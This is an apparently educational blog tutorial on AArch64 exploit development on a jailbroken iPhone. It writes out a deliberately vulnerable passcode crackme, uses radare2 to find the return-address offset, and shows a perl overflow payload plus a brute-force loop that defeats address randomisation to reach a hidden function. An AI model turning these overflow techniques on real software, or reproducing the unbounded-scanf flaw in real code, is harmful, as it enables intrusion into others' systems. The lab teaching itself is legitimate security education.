▄▄·       ·▄▄▄▄  ▄▄▄ .• ▌ ▄ ·. ▄• ▄▌ ▄▄·  ▄ .▄
▐█ ▌▪▪     ██▪ ██ ▀▄.▀··██ ▐███▪█▪██▌▐█ ▌▪██▪▐█
██ ▄▄ ▄█▀▄ ▐█· ▐█▌▐▀▀▪▄▐█ ▌▐▌▐█·█▌▐█▌██ ▄▄██▀▐█
▐███▌▐█▌.▐▌██. ██ ▐█▄▄▌██ ██▌▐█▌▐█▄█▌▐███▌██▌▐▀
·▀▀▀  ▀█▄▀▪▀▀▀▀▀•  ▀▀▀ ▀▀  █▪▀▀▀ ▀▀▀ ·▀▀▀ ▀▀▀ ·
    
android, iOS, web :: hacking + reverse engineering

Learning AArch64 Exploit Development on iOS with Radare2

hacking reverse engineering arm64 aarch64 mobile ios radare2

Turn your iPhone into an AArch64 (ARM64) binary exploitation learning lab! We'll set up a 64-bit ARM exploit development environment and explore memory corruption vulnerabilities on iOS using the powerful radare2 reverse engineering toolkit.

Background

Apple began shipping 64-bit ARM CPUs with the iPhone 5s in 2013. That device used the then-new A7 chip which, like the iPhone chips that followed it, is based on the ARMv8-A processor architecture and uses the A64 instruction set. Some of the more interesting features of that instruction set include:

  • 31 general purpose, 64-bit registers
  • Assumed 64-bit address sizes
  • Support for either 32-bit or 64-bit arguments
  • No use of the program counter (PC) or stack pointer (SP) as general purpose registers
  • Dedicated zero register

Due to the popularity of these devices and the increasing availability of jailbreaks such as checkra1n at the time of this writing, iOS can make for a great environment for learning the basics of ARM64 reverse engineering and exploitation.

Note: This guide will be focused on Apple devices because I use them for testing mobile applications, and so that's what I'm usually playing with and have lying around. If you're just looking for arm64 hardware to practice on, you can do the same with a Raspberry Pi >= 3 and most modern Android devices. Many of these are also based on the ARMv8-A architecture (not to mention, often cheaper than even refurbished Apple hardware), so feel free to research the device you have in mind and see if you can use it for your lab :-)

Prerequisites

You're going to need the following things to follow along:

  • A jailbroken iPhone with an A7 or later CPU and the Cydia package manager. If you're not sure whether your device can be jailbroken, you can check this site.
  • The radare2 reverse engineering framework.

I'm also assuming you're familiar with the following:

  • How to jailbreak your device and install packages through Cydia.
  • How to connect to your device via SSH from your wireless network, or through a USB mux such as iphone_tunnel.

Environment Setup

  1. Jailbreak your device, using whatever option works for your iOS version.
  2. Make sure you have the https://apt.bingner.com/ repo in Cydia and install the OpenSSH package.
  3. Install curl and clang from the repo above using Cydia.
  4. Optional: Install some sort of text editor (nano or Vim) if you want to work exclusively on your iPhone via SSH.
  5. Download and install radare2. There are a few different ways you can do this. The recommended method is to pull the latest version from GitHub using the instructions they have listed there.

For the sake of time, you can also pull an older pre-built .deb from their repo:

curl -LO http://cydia.radare.org/pool/main/r/radare2/radare2_3.7.1_iphoneos-arm.deb
dpkg -i radare2_3.7.1_iphoneos-arm.deb
  6. We'll be compiling our own programs. In order to set up the SDKs that we'll need, add the https://jakeashacks.net/cydia/ repo and install Theos, which you can read about here.
  7. Download some iOS SDKs:
echo "export THEOS=/var/theos" >> ~/.profile
export THEOS=/var/theos   # also set it for the current shell, so $THEOS works below
curl -LO https://github.com/theos/sdks/archive/master.zip
TMP=$(mktemp -d)
unzip master.zip -d "$TMP"
mv "$TMP"/sdks-master/*.sdk "$THEOS/sdks"
rm -r master.zip "$TMP"

And that's all we should need!

Vulnerability Overview

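During program execution, an area of the process's memory called the stack is used as temporary storage for information such as the current function's local variables. The stack is also used to store a return address, which will be loaded into the program counter once the function returns. It is a LIFO data structure that grows toward lower memory addresses (the top of the stack has a lower memory address than the item at the bottom). On x86 it is manipulated via the PUSH and POP instructions; A64 has no such instructions, so AArch64 code adjusts sp directly and saves or restores registers with store and load pairs (stp and ldp). The return address itself lives in the link register (x30), which a function saves to the stack before it calls anything else.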

A stack overflow condition is a scenario in which we are able to write past the end of a buffer on the stack with data of our choosing, eventually overwriting the saved return address with a value we control. The end result of this is the ability to control the execution flow of the vulnerable program using input that we supply in some way. Exploitation of this type of memory corruption vulnerability can allow us to execute our own shellcode, or execute a specific function elsewhere in the target program.

Modern systems have safeguards against the simplest types of buffer overflow, and so in this post we'll be working with a contrived example in order to focus on the basics. Just know that binary exploitation is a constantly evolving area, and there are specific techniques that have been developed over the years to bypass these safeguards. In fact, we'll be using one of the least sophisticated techniques (brute force) to bypass a common buffer overflow mitigation.

A Simple CrackMe

Our target for this guide will be a simple C program, which you should save as passcode.c:
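The listing itself is missing from this copy of the post. What follows is a reconstruction, not the author's original source: it is pieced together from the function names, imports, and strings that radare2 reports later in this guide, so the variable names, the comparison against the key, and the exact printf format in pass are all assumptions. It is wrapped in a shell here-document so it can be pasted straight into an SSH session.

```shell
# Write a reconstructed passcode.c into the current directory.
# NOTE: reconstruction based on the symbols and strings shown later in this
# post; the author's original source may differ.
cat > passcode.c <<'EOF'
#include <stdio.h>
#include <string.h>

/* Assumed to be a global; the string is the one radare2's iz command lists. */
const char *key = "key{c0demuch-armlab-2020-!}";

/* Never called by the program; this is the function we want to reach. */
void pass(void) {
    printf("%s\n", key);
}

void greet(void) {
    char buf[42];                 /* the 42-byte buffer */

    printf("Enter the passcode: ");
    scanf("%[^\n]s", buf);        /* no field width: input length is unchecked */

    if (strcmp(buf, key) == 0) {
        printf("Great job!\n");
    } else {
        printf("WRONG!\n");
    }
}

int main(void) {
    greet();
    return 0;
}
EOF
```

If your build of this sketch behaves differently from the output shown in the rest of the post (for example, a different offset), trust the numbers your own radare2 session reports.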

This program requests a password, takes an input from STDIN using the unsafe scanf function, and then tells you the passcode is wrong :-). The program also has an interesting function called pass, which just prints the correct passcode to the console using the printf function. Some key observations:

  • The unsafe scanf call uses the format %[^\n]s, which has no field width, so it will copy a line of any length into a 42-byte buffer.
  • The pass function is never called…

The goal of this exercise is to overflow that buffer and redirect program flow to the pass function to print the passcode. So, go ahead and compile it with the following on your device:

clang passcode.c -fno-stack-protector -isysroot /var/theos/sdks/iPhoneOS10.3.sdk -o passcode

Note the following arguments:

  • -fno-stack-protector - Disable stack canaries, which will make it easier to exploit this demo program.
  • -isysroot - Used to specify the location of the SDK (which you should've downloaded earlier) that we want to build our program with.

Inspecting the Binary

One of the tools that comes with radare2 is rabin2, which we will use to extract some information about the target binary:

# rabin2 -I passcode
arch     arm
binsz    51184
bintype  mach0
bits     64
canary   false
class    MACH064
crypto   false
endian   little
havecode true
intrp    /usr/lib/dyld
lang     c
linenum  false
lsyms    false
machine  v8
maxopsz  4
minopsz  4
nx       false
os       ios
pcalign  4
pic      true
relocs   false
static   false
stripped false
subsys   darwin
va       true

There's a lot of valuable information here, but the interesting lines for this exercise are the pic, canary, endian, and stripped fields, which are worth reading more about :-)
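As a starting point for that reading, here is how I'd summarize those four fields. pic true means the code is position independent, so its load address can change between runs. canary false means there is no stack protector, which matches the -fno-stack-protector flag we compiled with. endian little means multi-byte values are stored lowest byte first. stripped false means symbol names such as _pass are still in the binary. The small filter below keeps just those lines; show_fields is a helper name I made up, and it only runs grep over rabin2's text output.

```shell
# Keep only the rabin2 -I fields discussed above.
# show_fields is a hypothetical helper; it reads rabin2's text output on stdin.
show_fields() {
    grep -E '^(canary|endian|pic|stripped)[[:space:]]'
}

# On the device this would be used as:
#   rabin2 -I passcode | show_fields
```

Reading from stdin keeps the helper usable on saved output as well as on a live rabin2 run.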

Next, we want to open up the binary in radare2 with the -A flag, which runs the built-in analysis on load.

# r2 -A passcode
[x] Analyze all flags starting with sym. and entry0 (aa)
[ ] 
[Value from 0x100007e0c to 0x100007fb5
aav: 0x100007e0c-0x100007fb5 in 0x100007e0c-0x100007fb5
aav: 0x100007e0c-0x100007fb5 in 0x100007fb8-0x100008030
Value from 0x100007fb8 to 0x100008030
aav: 0x100007fb8-0x100008030 in 0x100007e0c-0x100007fb5
aav: 0x100007fb8-0x100008030 in 0x100007fb8-0x100008030
[x] Analyze function calls (aac)
[x] Analyze len bytes of instructions for references (aar)
[x] Use -AA or aaaa to perform additional experimental analysis.
[x] Constructing a function name for fcn.* and sym.func.* functions (aan)
[0x100007ed4]>

Let's use the afl command to list all functions:

[0x100007ed4]> afl
0x100007e0c    4 144          sym._greet
0x100007e9c    1 56           sym._pass
0x100007ed4    1 44           entry0
0x100007f00    1 12           sym.imp.printf
0x100007f0c    1 12           sym.imp.scanf
0x100007f18    1 12           sym.imp.strcmp

…and the iz command to list strings from the program's data section:

[0x100007ed4]> iz
000 0x00007f60 0x100007f60  32  33 (3.__TEXT.__cstring) ascii key{c0demuch-armlab-2020-!}
001 0x00007f81 0x100007f81  20  21 (3.__TEXT.__cstring) ascii Enter the passcode: 
002 0x00007f96 0x100007f96   6   7 (3.__TEXT.__cstring) ascii %[^\n]s
003 0x00007f9d 0x100007f9d  11  12 (3.__TEXT.__cstring) ascii Great job!\n
004 0x00007fa9 0x100007fa9   7   8 (3.__TEXT.__cstring) ascii WRONG!\n

We can use the s command to seek to a specific symbol (in this case, the name of a function), and then use the pdf command to print the disassembled function:

[0x100007ed4]> s sym._pass
[0x100007e9c]> pdf
|           ;-- func.100007e9c:
/ (fcn) sym._pass 56
|   sym._pass ();
|           0x100007e9c      ff8300d1       sub sp, sp, 0x20
|           0x100007ea0      fd7b01a9       stp x29, x30, [sp, 0x10]
|           0x100007ea4      fd430091       add x29, sp, 0x10
|           0x100007ea8      080000b0       adrp x8, reloc.dyld_stub_binder ; 0x100008000
|           0x100007eac      08a10091       add x8, x8, 0x28
|           0x100007eb0      00000090       adrp x0, 0x100007000
|           0x100007eb4      00c43e91       add x0, x0, 0xfb1
|           0x100007eb8      080140f9       ldr x8, [x8]
|           0x100007ebc      e9030091       mov x9, sp
|           0x100007ec0      280100f9       str x8, [x9]
|           0x100007ec4      0f000094       bl sym.imp.printf          ; int printf(const char *format)
|           0x100007ec8      fd7b41a9       ldp x29, x30, [sp, 0x10]
|           0x100007ecc      ff830091       add sp, sp, 0x20
\           0x100007ed0      c0035fd6       ret

Exploitation

If you've ever used a tool like pattern_create.rb from Metasploit Framework, you might be familiar with the concept of De Bruijn patterns. The goal is to create a cyclic pattern of bytes in which every short run of characters is unique, and to provide it as input when working on a memory corruption vulnerability. Because each run is unique, whatever lands in a register tells you how many bytes of input came before it, and therefore how many bytes are needed to overwrite that register. In this case, that will be the program counter (PC).

Radare2 has similar functionality built in, most easily reached through the ragg2 command:

$ ragg2 -P 256 -r; echo ''
AAABAACAADAAEAAFAAGAAHAAIAAJAAKA...

At this point, I want to mention that the radare2 binary itself contains a lot of the functionality of its supporting tools. You can duplicate this behavior of ragg2 by running radare2 in quiet mode and piping the output to rax2 with this one-liner:

$ r2 -q -c 'wopD* 256' - | cut -d ' ' -f2 | rax2 -s; echo ''
AAABAACAADAAEAAFAAGAAHAAIAAJAAKA...

The result here should be a 256 byte pattern.

Note: There are a lot of situations where you can perform the work of external tools directly within r2. My suggestion is to play around with the help menus and explore these options.

So, let's take that pattern of input and feed it into our program via STDIN.

# radare2 -q -c 'wopD* 256' - | cut -d ' ' -f2 | rax2 -s | ./passcode 
Enter the passcode: WRONG!
Bus error: 10

The resulting bus error tells us that we have successfully overwritten the saved return address, and with it the program counter. After you cause a crash on iOS, a crash report will be created. There are a couple of ways to view this, but the easiest is just to find the most recent crash file from the command line:

ls -lat /var/mobile/Library/Logs/CrashReporter/

NOTE: You can also use Xcode's Window -> Devices and Simulators -> Open Console to find the location of your crash report, then note the location of the created .ips file and open it with your editor. Alternatively, you can view the crash report on the device itself through the very well hidden path in the Settings menu of Privacy -> Analytics -> Analytics Data. Don't ask why :-)

If we take a look at the newest crash report, this is an excerpt of what we find:

Exception Type:  EXC_BAD_ACCESS (SIGBUS)
Exception Subtype: EXC_ARM_DA_ALIGN at 0x0041415341415241
VM Region Info: 0x41415341415241 is not in any region.  Bytes after previous region: 18367690227831362  
      REGION TYPE                      START - END             [ VSIZE] PRT/MAX SHRMOD  REGION DETAIL
      unused shlib __TEXT    000000021c926000-000000021de18000 [ 20.9M] r--/r-- SM=COW  ... this process
--->  
      UNUSED SPACE AT END

Termination Signal: Bus error: 10
Termination Reason: Namespace SIGNAL, Code 0xa
Terminating Process: exc handler [6172]
Triggered by Thread:  0

Thread 0 Crashed:
0   ???                           	0x0041415341415241 0 + 18367699319083585

Thread 0 crashed with ARM Thread State (64-bit):
    x0: 0x0000000000000007   x1: 0x0000000000000000   x2: 0x00000000000120a8   x3: 0x0000000101001c1b
    x4: 0x00000001006e3fa9   x5: 0x000000016f723570   x6: 0x000000000000000a   x7: 0x0000000000000000
    x8: 0x0000000100802c6c   x9: 0x00000002140c9ae0  x10: 0x00000002140c8e40  x11: 0x0000000000000002
   x12: 0x00000000fffffffd  x13: 0x0000010000000000  x14: 0x0000000000000000  x15: 0x0000000000000000
   x16: 0x0000000000000000  x17: 0x0000000000000000  x18: 0x0000000000000000  x19: 0x0000000000000000
   x20: 0x0000000000000000  x21: 0x0000000000000000  x22: 0x0000000000000000  x23: 0x0000000000000000
   x24: 0x0000000000000000  x25: 0x0000000000000000  x26: 0x0000000000000000  x27: 0x0000000000000000
   x28: 0x000000016f723618   fp: 0x415141415041414f   lr: 0x5441415341415241
    sp: 0x000000016f7235d0   pc: 0x0041415341415241 cpsr: 0x20000000

If you look at the value of the program counter or pc, you can see the value 0x0041415341415241, which is a hex representation of some characters from our pattern. This means that we now control pc, and can in theory control the flow of this program!
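To see which characters those are, the register value can be decoded by hand. The sketch below prints the bytes of a 64-bit value in memory order (lowest byte first, since we're little endian) as ASCII. reg_to_ascii is a helper name of my own, and the three values are the pc, lr, and fp from the crash report above.

```shell
# reg_to_ascii is a hypothetical helper: print the bytes of a 64-bit register
# value as ASCII in memory order (little endian, lowest byte first).
# NUL bytes are skipped because they have no printable form.
reg_to_ascii() {
    hex=$(printf '%016x' "$1")
    out=""
    i=15
    while [ "$i" -ge 1 ]; do
        # take two hex digits, starting from the least significant byte
        byte=$(printf '%s' "$hex" | cut -c "$i-$((i + 1))")
        if [ "$byte" != "00" ]; then
            # hex byte -> octal escape -> character
            out="$out$(printf '%b' "$(printf '\\0%03o' "0x$byte")")"
        fi
        i=$((i - 2))
    done
    printf '%s\n' "$out"
}

reg_to_ascii 0x0041415341415241   # pc -> ARAASAA
reg_to_ascii 0x5441415341415241   # lr -> ARAASAAT
reg_to_ascii 0x415141415041414f   # fp -> OAAPAAQA
```

All three decode to runs of the AAA, BAA, CAA, ... pattern, which confirms that our input reached the saved frame pointer and return address.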

Our next step will be figuring out how to overwrite pc with something useful. If you look again at our use of the afl command, you will see 0x100007e9c listed as the address for the pass function.

[0x100007ed4]> afl
0x100007e0c    4 144          sym._greet
0x100007e9c    1 56           sym._pass
0x100007ed4    1 44           entry0
0x100007f00    1 12           sym.imp.printf
0x100007f0c    1 12           sym.imp.scanf
0x100007f18    1 12           sym.imp.strcmp

Now, a slightly confusing hurdle that you may run into is that a binary with the ability to debug other programs needs to be signed with the correct entitlements. What worked for me was copying the /binr/radare2/radare2_ios.xml entitlement file to /tmp on my iOS device and signing my radare2 binaries with it, like so (ldid also expects the path of the binary to sign as its final argument):

ldid -S/tmp/radare2_ios.xml

If you don't do that, you may get the following error message:

radare2 -d ~/exploit_dev/passcode
Child killed
ptrace: Cannot attach: Invalid argument
Possibly unsigned r2. Please see doc/macos.md
ERRNO: 22 (EINVAL)
Child killed
ptrace: Cannot attach: Invalid argument
Possibly unsigned r2. Please see doc/macos.md
ERRNO: 22 (EINVAL)
[w] Cannot open 'dbg:///var/root/exploit_dev/passcode' for writing.

Now that you hopefully have everything working, we can try to figure out how many bytes we need to overwrite pc.
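The command below points dbg.profile at input.rr2, a rarun2 profile whose contents this post never shows. Here is a minimal sketch of what such a profile could contain, assuming the goal is simply to feed the cyclic pattern to the target's stdin while it runs under the debugger. The LAB variable and the pattern.txt file name are placeholders of mine; program and stdin are standard rarun2 directives.

```shell
# Hypothetical layout: everything lives in $LAB (defaults to the current directory).
LAB=${LAB:-$PWD}

# Save the cyclic pattern to a file, if ragg2 is available on this machine.
if command -v ragg2 >/dev/null 2>&1; then
    ragg2 -P 256 -r > "$LAB/pattern.txt"
fi

# rarun2 profile: run the target with stdin redirected from the pattern file.
cat > "$LAB/input.rr2" <<EOF
program=$LAB/passcode
stdin=$LAB/pattern.txt
EOF
```

With LAB set to /var/root/exploit_dev, this produces a profile at the path used in the session that follows.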

# radare2 -e dbg.profile=/var/root/exploit_dev/input.rr2 -d passcode
= attach 7399 7399
bin.baddr 0x102b38000
Using 0x102b38000
asm.bits 64
Warning: r_bin_file_hash: file exceeds bin.hashlimit
 -- There's more than one way to skin a cat
[0x102c65000]> dc
Enter the passcode: WRONG!
EXC_BAD_ACCESS
[0x41415341415241]> 

The dr command shows the value of a register, and so we'll combine that with the wopO command, which lets us calculate the offset at which a given value occurs in our pattern.

[0x41415341415241]> wopO `dr pc`
50

What this tells us is that the value in pc, 0x41415341415241, occurs at an offset of 50 in the pattern. That means we will need to send 50 bytes of padding at the start of our malicious input, and the bytes after that will overwrite pc. Knowing that, we should be able to get a working exploit. We know that 0x100007e9c is the address of our target function, so that is the value we want to land in pc. However, as we can see in the output of rabin2, we're working in little-endian mode, meaning the least significant byte appears first. And so, we will need to feed 9c 7e 00 00 01 into our exploit in order to correctly overwrite pc.
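The offset of 50 can be cross-checked without radare2. Read lowest byte first, the pc value 0x0041415341415241 is the ASCII string ARAASAA, and the fp value 0x415141415041414f is OAAPAAQA. The sketch below rebuilds the start of the pattern and looks both strings up. It assumes the pattern begins AAA, BAA, CAA, ... as in the ragg2 output shown earlier, and pattern_offset is a helper name I made up.

```shell
# Rebuild the start of the pattern: "AAA", "BAA", "CAA", ... (78 bytes).
# Assumption: this matches the prefix that ragg2 printed earlier.
pattern=""
for c in A B C D E F G H I J K L M N O P Q R S T U V W X Y Z; do
    pattern="$pattern${c}AA"
done

# pattern_offset is a hypothetical helper: 0-based offset of $1 in the
# pattern, or -1 if it does not occur.
pattern_offset() {
    awk -v p="$pattern" -v n="$1" 'BEGIN { print index(p, n) - 1 }'
}

pattern_offset ARAASAA    # bytes that landed in pc -> 50
pattern_offset OAAPAAQA   # bytes that landed in fp -> 42
```

The two results line up with the stack layout: the 42-byte buffer is followed by 8 bytes of saved frame pointer, and the saved return address starts right after that, at byte 50.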

The following perl one-liner should do for a proof-of-concept:

perl -e 'print "A"x50 . "\x9c\x7e\x00\x00\x01";' | ./passcode
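If you'd rather not reverse the bytes by hand, the escape string can be derived from the address. This is a small sketch in plain shell arithmetic; le_escapes is a helper name of my own, and the 5 is just the number of address bytes used in the one-liner above.

```shell
# le_escapes is a hypothetical helper: print perl-style \x escapes for the
# low COUNT bytes of ADDR, least significant byte first.
le_escapes() {
    addr=$1
    count=$2
    out=""
    while [ "$count" -gt 0 ]; do
        out="$out$(printf '\\x%02x' $(($addr & 0xff)))"
        addr=$(($addr >> 8))
        count=$((count - 1))
    done
    printf '%s\n' "$out"
}

le_escapes 0x100007e9c 5   # -> \x9c\x7e\x00\x00\x01
```

The output can be pasted into the perl string after the 50 bytes of padding.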

We can confirm our exploit by running this as the input for passcode, and checking the latest crash report:

Exception Type:  EXC_BAD_ACCESS (SIGSEGV)
Exception Subtype: KERN_INVALID_ADDRESS at 0x0000000100007e9c
VM Region Info: 0x100007e9c is not in any region.  Bytes before following region: 71221604
      REGION TYPE                      START - END             [ VSIZE] PRT/MAX SHRMOD  REGION DETAIL
      UNUSED SPACE AT START
--->  
      __TEXT                 00000001043f4000-00000001043fc000 [   32K] r-x/r-x SM=COW  ..._dev/passcode

Termination Signal: Segmentation fault: 11
Termination Reason: Namespace SIGNAL, Code 0xb
Terminating Process: exc handler [7455]
Triggered by Thread:  0

Thread 0 Crashed:
0   ???                           	0x0000000100007e9c 0 + 4294999708

Thread 0 crashed with ARM Thread State (64-bit):
    x0: 0x0000000000000007   x1: 0x0000000000000000   x2: 0x00000000000120a8   x3: 0x000000010580001b
    x4: 0x00000001043fbfa9   x5: 0x000000016ba0b580   x6: 0x000000000000000a   x7: 0x0000000000000000
    x8: 0x000000010460ac6c   x9: 0x00000002140c9ae0  x10: 0x00000002140c8e40  x11: 0x0000000000000002
   x12: 0x00000000fffffffd  x13: 0x0000010000000000  x14: 0x0000000000000000  x15: 0x0000000000000000
   x16: 0x0000000000000000  x17: 0x0000000000000000  x18: 0x0000000000000000  x19: 0x0000000000000000
   x20: 0x0000000000000000  x21: 0x0000000000000000  x22: 0x0000000000000000  x23: 0x0000000000000000
   x24: 0x0000000000000000  x25: 0x0000000000000000  x26: 0x0000000000000000  x27: 0x0000000000000000
   x28: 0x000000016ba0b620   fp: 0x4141414141414141   lr: 0x0000000100007e9c
    sp: 0x000000016ba0b5e0   pc: 0x0000000100007e9c cpsr: 0x20000000

Our program counter has been overwritten to 0x0000000100007e9c, which is the value of the pass function's location in virtual memory.

So why aren't we getting our key? Well, the issue here is something that we saw in the output of rabin2: Position Independent Code, also known as pic or pie. In short, a Position Independent Executable can be loaded at a random memory location each time it runs, which means 0x0000000100007e9c is potentially not the location of our function. Fortunately, there are still only a limited number of positions where our target function might be loaded, meaning it's brute-forceable.
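The crash report above makes this concrete: it shows passcode's __TEXT region starting at 0x1043f4000 for that run. Assuming the usual static base of 0x100000000 for a 64-bit Mach-O (which is what the addresses in radare2 suggest), the slide and the real address of pass in that run work out as follows. The variable names are mine.

```shell
# Values taken from the crash report and radare2 output above.
static_base=0x100000000      # assumed default __TEXT base of a 64-bit Mach-O
static_pass=0x100007e9c      # sym._pass as listed by afl
runtime_base=0x1043f4000     # start of passcode's __TEXT region in the crash report

slide=$(($runtime_base - $static_base))
runtime_pass=$(($static_pass + $slide))

printf 'slide:       0x%x\n' "$slide"          # 0x43f4000
printf 'pass at run: 0x%x\n' "$runtime_pass"   # 0x1043fbe9c
```

So in that run pass was at 0x1043fbe9c, not at the address we sent. As far as I can tell, the hard-coded address only matches on runs where the slide happens to be zero.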

So, let's try it with a loop…

while true; do perl -e 'print "A"x50 . "\x9c\x7e\x00\x00\x01";' | ./passcode; done

Sure enough, after a few seconds of our loop running, our exploit triggers and we get the following:

key{c0demuch-armlab-2020-!}
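If you'd like the loop to stop on its own and report how many tries it took, a bounded variant could look like the sketch below. The function names are hypothetical, and it assumes that a successful run prints something containing key{. head -c caps how much output is read in case the target keeps printing after control has been redirected. One caveat: stdout is a pipe in this version, so a hit is only seen if the target flushes its output before it dies; treat this as something to adapt rather than a drop-in replacement.

```shell
# try_payload: one attempt with the payload from this post.
try_payload() {
    perl -e 'print "A"x50 . "\x9c\x7e\x00\x00\x01";' | ./passcode 2>/dev/null | head -c 256
}

# brute_force MAX: call try_payload up to MAX times and stop at the first
# attempt whose output contains "key{". Both function names are hypothetical.
brute_force() {
    max=$1
    n=0
    while [ "$n" -lt "$max" ]; do
        n=$((n + 1))
        out=$(try_payload) || true
        case $out in
            *'key{'*)
                printf 'hit after %d attempts\n' "$n"
                return 0
                ;;
        esac
    done
    printf 'no hit in %d attempts\n' "$max"
    return 1
}

# On the device: brute_force 5000
```

Keeping the single attempt in its own function makes it easy to swap in a different payload or target without touching the loop.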

Conclusion

That's all for now! Hopefully you learned a little bit about setting up a testing environment and exploring memory corruption vulnerabilities on AArch64 using radare2. In the next post in this series, we'll cover more advanced topics.